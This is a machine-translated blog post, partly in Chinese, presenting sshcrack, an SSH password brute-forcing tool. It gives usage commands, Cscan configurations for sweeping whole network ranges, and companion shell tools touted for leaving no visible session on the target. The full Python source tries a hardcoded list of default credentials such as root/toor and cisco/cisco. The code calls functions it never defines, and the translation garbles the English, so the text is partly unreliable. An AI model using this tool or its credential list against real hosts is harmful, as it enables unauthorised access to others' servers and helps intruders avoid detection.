0x000 Foreword
sshcrack SSH password blasting is under a command line tool, suitable for detecting the seepage SSH password
Of course, can also be used outside the network SSH password blasting, support Windows / Linux, other systems not measured. Tip1
0x001 directory
1.sshcrack usage
2.Cscan batch scanning
3. Run the SSH connection
4.sshcrack source
5. Download
0x002 usage
Specifies the SSH server password detection
Weak password detection (-crack user passwords can just write, write a list of secret accounts since dead) C: \ the Users \ K8team \ Desktop \ the Upload> 22 root k8gege -crack sshcrack.exe 192.168.1.106 192.168.1.106 22 root toor LoginOK single password authentication (-test) C: \ the Users \ K8team \ Desktop \ Upload> 22 is the root toor -test sshcrack.exe 192.168.1.106 192.168.1.106 22 is the root toor LoginOK
0x003 batch SSH server password detection
0. The Cscan.exe Cscan.ini sshcrack.exe placed in the same directory
Cscan.ini follows
1. Blasting weak password (password or no current account acquired more dense)
[Cscan] exe=sshcrack.exe arg=$ip$ 22 "" "" -crack
2. Verify a password known (the rapid detection of whether other machines using the same network account secret)
[Cscan] exe=sshcrack.exe arg=$ip$ 22 root k8gege -test
Scanning a single segment 3.Cscan C / B segment / A machine section
cscan 192.168.1.108 (Single the IP) 192.168.1.108/24 (C para) Cscan Cscan 192.168.1.108/16 (segment B) Cscan 192.168.1.108/8 (segment A)
Batch 4.Cscan IP / Batch C section / paragraph B Batch scanning
New ip24.txt or ip16.tx or ip.txt file, and then to enter Cscan (no other parameters)
The following Cscan.ini no port is specified, because the non-identified by K8portscan port 22
Do not specify a port means ip.txt need to fill in the corresponding SSH on port
0x004 connection SSH command execution
1.sshshell interactive connection
sshshell.exe 192.168.1.106 22 root toor
sshshell.exe interactive single-file SSH connection means (similar advantages can maintain session putty, putty similar shortcomings remain connected)
2.sshcmd non-interactive command line
Ends are advantages to logout command session immediately (i.e., do not see the target network connection), a dedicated network penetration
3. penetration Edition SSH connectivity tools GUI version
When the advantages are immediately End Run logoff session (i.e., do not see the target network connection), a dedicated penetration, the network may be out of the proxy or external network connection SSH
Of course, it can also be used for daily use VPS management, GUI version with file management, support for upload and download single files or entire directories
0x005 sshcrack source
Recommend password-coded for easy batch scanning with Cscan, or else every one sweep, sshcrack to read about the password list, it may affect the efficiency of batch.
以下是例子,大家可自行修改,根据自身项目添加对应密码字典,脚本还需完善,如跑出root密码后停止检测root用户或者不再爆破。
#sshcrack 1.0 #author: k8gege #https://www.cnblogs.com/k8gege #https://github.com/k8gege import paramiko import sys import logging ssh = paramiko.SSHClient() ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) logging.raiseExceptions=False def checkSSH(host,port,user,pwd): try: ssh.connect(host,port,user,pwd) print host+' '+port+' '+user+' '+pwd+' LoginOK' checkDns() checkPing() except: pass host=sys.argv[1] port=sys.argv[2] user=sys.argv[3] pwd=sys.argv[4] type=sys.argv[5] if type=='-test': checkSSH(host,port,user,pwd) elif type=='-crack': checkSSH(host,port,'root','123456') checkSSH(host,port,'root','cisco') checkSSH(host,port,'root','Cisco') checkSSH(host,port,'admin','123456') checkSSH(host,port,'cisco','123456') checkSSH(host,port,'cisco','cisco') checkSSH(host,port,'Cisco','Cisco') checkSSH(host,port,'cisco','cisco123') checkSSH(host,port,'admin','admin') checkSSH(host,port,'root','Admin') checkSSH(host,port,'root','toor') checkSSH(host,port,'root','Admin123') checkSSH(host,port,'root','system') checkSSH(host,port,'root','system123') checkSSH(host,port,'root','System') checkSSH(host,port,'root','System123') checkSSH(host,port,'root','Admin123!@#') checkSSH(host,port,'root','root123!@#') checkSSH(host,port,'root','root2019') checkSSH(host,port,'root','root2018') checkSSH(host,port,'root','root2017') checkSSH(host,port,'root','root2016') checkSSH(host,port,'root','root2015') checkSSH(host,port,'root','root2014') checkSSH(host,port,'root','root2013') checkSSH(host,port,'root','root2012') else: checkSSH(host,port,user,pwd)
0x006 工具下载
https://github.com/k8gege/sshshell
https://github.com/k8gege/K8tools
https://github.com/k8gege/K8CScan
Tip1: Python写的程序一定跨平台?
Python虽是跨平台语言,但不见得Python写的程序一定支持所有系统
支不支持主要是看写代码的人,比如有些依赖包仅Linux下或Win下可用
你直接调用人家的包,未做任何修改,你认为一定是跨平台吗???
就算是只用原生包写的功能,也不能保证完全兼容
有些功能针对于不同系统需做不同的处理
Tip2: SSH连接工具详细说明
[原创]内网渗透专用SSH连接工具sshcmd/sshshell/ssh密码破解以及Kali开启SSH
https://www.cnblogs.com/k8gege/p/10991264.html